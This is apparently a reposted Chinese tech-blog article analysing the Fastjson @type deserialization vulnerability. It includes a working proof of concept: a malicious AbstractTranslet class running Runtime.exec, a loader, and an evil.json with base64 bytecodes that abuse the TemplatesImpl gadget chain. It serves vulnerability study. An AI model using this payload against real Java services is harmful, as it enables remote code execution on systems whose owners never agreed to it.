親手帶你解決Debug Fastjson的安全漏洞

更新時間：2020年06月11日 09:38:13 作者：Java架構俱樂部

這篇文章主要介紹了親手帶你解決Debug Fastjson的安全漏洞，文中通過示例代碼介紹的非常詳細，對大家的學習或者工作具有一定的參考學習價值，需要的朋友們下面隨著小編來一起學習學習吧

簡介

Java處理JSON數(shù)據(jù)有三個比較流行的類庫，gson(google維護)、jackson、以及今天的主角fastjson，fastjson是阿里巴巴一個開源的json相關的java library，地址在這里，

Fastjson可以將java的對象轉換成json的形式，也可以用來將json轉換成java對象，效率較高，被廣泛的用在web服務以及android上，它的JSONString（）方法可以將java的對象轉換成json格式，同樣通過parseObject方法可以將json數(shù)據(jù)轉換成java的對象。

大概在4月18號的時候，fastjson進行了一次安全更新，通告在這里

https://github.com/alibaba/fastjson/wiki/security_update_20170315，

當時對這也不熟悉，斷斷續(xù)續(xù)看了幾天也沒什么收獲(主要是因為太菜了TAT)。最近有人出了poc以及分析的文章就跟進了一下，漏洞還是挺有意思。

fastjson簡單使用介紹

工欲善其事，必先利其器，要想研究這個漏洞，就要先要了解這個fastjson是干什么的。自己研究了一下這個類庫。User.java code如下：

testFastJson.java code如下：

package fastjsonVul.fastjsonTest;
import java.util.HashMap;
import java.util.Map;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.serializer.SerializerFeature;
import fastjsonVul.fastjsonTest.User;
public class testFastJson {
        
    public static void main(String[] args){
        Map<String, Object> map = new HashMap<String, Object>();
        map.put("key1","One");
        map.put("key2", "Two");
        String mapJson = JSON.toJSONString(map);    
        System.out.println(mapJson);
        
        User user1 = new User();
        user1.setUsername("果汁簡歷");
        user1.setSex("male");    
        System.out.println("obj name:"+user1.getClass().getName());
        
        //序列化
        String serializedStr = JSON.toJSONString(user1);
        System.out.println("serializedStr="+serializedStr);
        
        String serializedStr1 = JSON.toJSONString(user1,SerializerFeature.WriteClassName);
        System.out.println("serializedStr1="+serializedStr1);
        
        //通過parse方法進行反序列化
        User user2 = (User)JSON.parse(serializedStr1);
        System.out.println(user2.getUsername());
        System.out.println();
        
        //通過parseObject方法進行反序列化  通過這種方法返回的是一個JSONObject
        Object obj = JSON.parseObject(serializedStr1);
        System.out.println(obj);
        System.out.println("obj name:"+obj.getClass().getName()+"\n");
        
        //通過這種方式返回的是一個相應的類對象
        Object obj1 = JSON.parseObject(serializedStr1,Object.class);
        System.out.println(obj1);
        System.out.println("obj1 name:"+obj1.getClass().getName());
        
    }
}

輸出是這樣

{"key1":"One","key2":"Two"}
obj name:fastjsonVul.fastjsonTest.User
serializedStr={"Sex":"male","Username":"果汁簡歷","sex":"male","username":"果汁簡歷"}
serializedStr1={"@type":"fastjsonVul.fastjsonTest.User","Sex":"male","Username":"xiaoming","sex":"male","username":"果汁簡歷"}
果汁簡歷

{"Username":"果汁簡歷","Sex":"male","sex":"male","username":"果汁簡歷"}
obj name:com.alibaba.fastjson.JSONObject

fastjsonVul.fastjsonTest.User@18769467
obj1 name:fastjsonVul.fastjsonTest.User

Fastjson漏洞詳細

fastjson漏洞出現(xiàn)的地方也就是JSON.parseObject這個方法上面。

在最開始的時候，只能通過類初始化時候的構造函數(shù)或者變量的setter方法執(zhí)行惡意代碼，像是這樣

Evil.java

import java.io.IOException;
 
public class Evil {
 
    public String getName() {
        System.out.println("i am getterName!");
        return name;
    }
 
    public void setName(String name) {
        System.out.println("i am setterName!");
        this.name = name;
    }
 
    public String name;
 
    public int getAge() {
        System.out.println("i am getterAge!");
        return age;
    }
 
    public void setAge(int age) {
        System.out.println("i am setterAge!");
        this.age = age;
    }
 
    private int age;
 
    public Evil() throws IOException{
        System.out.println("i am constructor!");
    }
}

import com.alibaba.fastjson.JSON;
 
import java.io.*;
 
public class App{
    public static void readToBuffer(StringBuffer buffer, String filePath) throws IOException {
        InputStream is = new FileInputStream(filePath);
        String line; // 用來保存每行讀取的內(nèi)容
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        line = reader.readLine(); // 讀取第一行
        while (line != null) { // 如果 line 為空說明讀完了
            buffer.append(line); // 將讀到的內(nèi)容添加到 buffer 中
            buffer.append("\n"); // 添加換行符
            line = reader.readLine(); // 讀取下一行
        }
        reader.close();
        is.close();
    }
    public static void main( String[] args ) throws IOException
    {
        StringBuffer Buffer = new StringBuffer();
        App.readToBuffer(Buffer,"/Users/m0rk/vul/fastjson/src/demo.json");
        Object obj = JSON.parseObject(Buffer.toString());
    }
}

demo.json的內(nèi)容如下

{
 "@type" : "Evil1",
 "name" : "M0rk",
 "age"  : "20"}

可以看到通過@type"特性"，就執(zhí)行了構造函數(shù)以及私有和公有成員變量的getter和setter方法。但是這貌似還并沒有達到我們想要的結果，因為上面的情況是需要我們能夠控制Evil這個類（一般是通過文件寫入），目前來看不太現(xiàn)實。

還有一種方法就是將編譯好的.class或者.jar文件轉換成byte[]，然后通過defineClass加載byte[]返回class對象。

安全研究人員發(fā)現(xiàn)了這個類

com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl

這個類存在如下的調用鏈可加載byte[]完成.class文件中對象的實例化，注意MailCiousClass需要繼承AbstractTranslet（在defineTransle方法中存在一個校驗）。更多這個調用鏈參考鏈接
https://gist.github.com/frohoff/24af7913611f8406eaf3

如上圖所示的攻擊調用棧信息，可以看到和TemplatesImpl調用鏈完全吻合，最終還是通過defineclass加載了bytecodes[]導致了命令執(zhí)行。

Evil.java

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
public class Evil extends AbstractTranslet {
    public Evil() throws IOException {
        Runtime.getRuntime().exec("open /Applications/Calculator.app");
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
    }
 
    public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException {
    }
}

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import org.apache.commons.io.IOUtils;
import org.apache.commons.codec.binary.Base64;
 
import java.io.*;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 
 
public class poc {
 
    public static String readClass(String cls) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            IOUtils.copy(new FileInputStream(new File(cls)), bos);
        } catch (IOException e) {
            e.printStackTrace();
        }
        return Base64.encodeBase64String(bos.toByteArray());
 
    }
 
 
    public static void main(String args[]) throws Exception{
//        final String evilClassPath ="/Users/m0rk/vul/fastjson/src/Evil.class";
//        String evilCode = readClass(evilClassPath);
//        System.out.println(evilCode);
        StringBuffer Buffer = new StringBuffer();
        App.readToBuffer(Buffer, "/Users/m0rk/vul/fastjson/src/evil.json");
        Object obj = JSON.parseObject(Buffer.toString(),Object.class,Feature.SupportNonPublicField);
 
    }
}

evil.json

{
  "@type" : "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
  "_bytecodes" : ["yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgcAGwEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAcACAcAHAwAHQAeAQAhb3BlbiAvQXBwbGljYXRpb25zL0NhbGN1bGF0b3IuYXBwDAAfACABAARFdmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAACQAEAAoADQALAAsAAAAEAAEADAABAA0ADgABAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAADgABAA0ADwACAAkAAAAZAAAAAwAAAAGxAAAAAQAKAAAABgABAAAAEQALAAAABAABABAAAQARAAAAAgAS"],
  "_name" : "M0rk",
  "_tfactory" : {},
  "outputProperties" : {}
}

總結

關于這個漏洞的構造還是挺精巧，漏洞的利用條件比較苛刻，如要能夠利用，開發(fā)人員對json的處理函數(shù)需要是 JSON.parseObject(input, Object.class,
Feature.SupportNonPublicField);

而大部分的開發(fā)可能用用JSON.parse(input)就了事兒了，同時使用了parseObject和
Feature.SupportNonPublicField設置的估計不多。所以說實際環(huán)境中挖掘fastjson的這個漏洞應該是可遇不可求。

到此這篇關于親手帶你解決Debug Fastjson的安全漏洞的文章就介紹到這了,更多相關Debug Fastjson安全漏洞內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家！

您可能感興趣的文章:

JavaCV調用百度AI實現(xiàn)人臉檢測方法詳解
在檢測人臉數(shù)量、位置、性別、口罩等場景時，可以考慮使用百度開放平臺提供的web接口，一個web請求就能完成檢測得到結果。本文就為大家介紹JavaCV如何調用百度AI實現(xiàn)最簡單的人臉檢測，需要的可以參考一下
2022-01-01
SpringBoot + vue2.0查詢所用功能詳解
這篇文章主要介紹了SpringBoot + vue2.0查詢所用功能,本文給大家介紹的非常詳細,對大家的學習或工作具有一定的參考借鑒價值,需要的朋友參考下吧
2023-11-11
Java動態(tài)規(guī)劃篇之線性DP的示例詳解
這篇文章主要通過幾個例題為大家詳細介紹一些Java動態(tài)規(guī)劃中的線性DP，文中的示例代碼講解詳細，對我們學習Java有一定的幫助，需要的可以參考一下
2022-11-11
java創(chuàng)建多級目錄文件的實例講解
下面小編就為大家分享一篇java創(chuàng)建多級目錄文件的實例講解，具有很好的參考價值，希望對大家有所幫助。一起跟隨小編過來看看吧
2018-01-01
java進階之了解SpringBoot的配置原理
今天帶大家了解SpringBoot的相關知識,文中對SpringBoot的配置原理作了非常詳細的圖文示例及介紹,需要的朋友可以參考下
2021-06-06
一文學習Java NIO的ByteBuffer工作原理
很多網(wǎng)友說JDK又在寫B(tài)ug!下面通過通過本文學習下為何Java NIO的ByteBuffer這么垃圾，涉及到ByteBuf API 的優(yōu)點及工作原理解析，感興趣的朋友跟隨小編一起看看吧
2021-05-05
SpringBoot項目集成Swagger和swagger-bootstrap-ui及常用注解解讀
這篇文章主要介紹了SpringBoot項目集成Swagger和swagger-bootstrap-ui及常用注解解讀，具有很好的參考價值，希望對大家有所幫助。如有錯誤或未考慮完全的地方，望不吝賜教
2023-03-03
解決在Gradle/IDEA中無法正常使用readLine的問題原因
這篇文章主要介紹了在Gradle/IDEA中無法正常使用readLine的解決方法,原因是由于Gradle的標準輸入默認并不與系統(tǒng)標準輸入綁定,需手動設置，需要的朋友可以參考下
2021-12-12
Java實現(xiàn)兩人五子棋游戲(五) 判斷是否有一方勝出
這篇文章主要為大家詳細介紹了Java實現(xiàn)兩人五子棋游戲，判斷是否有一方勝出，具有一定的參考價值，感興趣的小伙伴們可以參考一下
2018-03-03
jmeter+ant+jenkins自動化測試環(huán)境配置搭建過程
在搭建jmeter+ant+jenkins環(huán)境有些前提條件，那就是要先配置好java環(huán)境、安裝好jenkins以及配置好jmeter，這樣才能省去很多的事情，對jmeter+ant+jenkins自動化測試環(huán)境配置搭建過程感興趣的朋友一起看看吧
2021-12-12